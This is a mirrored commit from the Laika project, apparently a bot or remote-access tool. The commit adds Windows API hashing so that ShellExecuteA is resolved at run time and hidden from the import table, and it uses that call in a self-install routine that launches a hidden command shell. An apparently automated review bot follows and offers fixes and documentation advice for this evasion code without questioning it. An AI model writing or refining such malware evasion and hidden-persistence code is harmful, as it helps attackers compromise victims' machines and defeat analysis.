mirror of https://github.com/CPunch/Laika.git synced 2025-11-18 10:20:08 +00:00

Bot: Added boilerplate windows API obfuscation

- Grabs the functions directly from the loaded library by walking the export address table and comparing hashes
- For now, only ShellExecuteA has been set up; more to come
2022-07-07 23:23:39 -05:00
parent 18a6fdd124
commit b2f8efc402
6 changed files with 166 additions and 2 deletions


@@ -11,6 +11,7 @@
#include "lerror.h"
#include "lmem.h"
#include "lvm.h"
#include "obf.h"
#include "persist.h"
HANDLE laikaB_mutex;
@@ -150,7 +151,7 @@ void installSelf()
lstrcatA(szCmd, szInstall);
if (GetEnvironmentVariableA("COMSPEC", szFile, MAX_PATH) == 0 ||
(INT)ShellExecuteA(NULL, NULL, szFile, szCmd, NULL, SW_HIDE) <= 32)
(INT)oShellExecuteA(NULL, NULL, szFile, szCmd, NULL, SW_HIDE) <= 32)
LAIKA_ERROR("Failed to start shell for moving exe!\n");
laikaB_unmarkRunning();
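Review bot: The changed call in installSelf() gives no hint that `oShellExecuteA` is, judging by the commit description, resolved at run time through obf.h rather than imported, so anyone auditing this file against the binary's import table will not find the shell launch there. A comment above the `if`, such as `/* oShellExecuteA: ShellExecuteA looked up by export hash (obf.h), absent from the import table */`, would make that explicit; the hidden COMSPEC launch itself is unchanged and still appears as a child process in process-creation logs. Separately, `(INT)` truncates the HINSTANCE-typed return value on 64-bit builds; the documented comparison is `(INT_PTR)oShellExecuteA(NULL, NULL, szFile, szCmd, NULL, SW_HIDE) <= 32`. installSelf() starts and ends outside this hunk, so whether the resolved pointer is checked before use cannot be seen here.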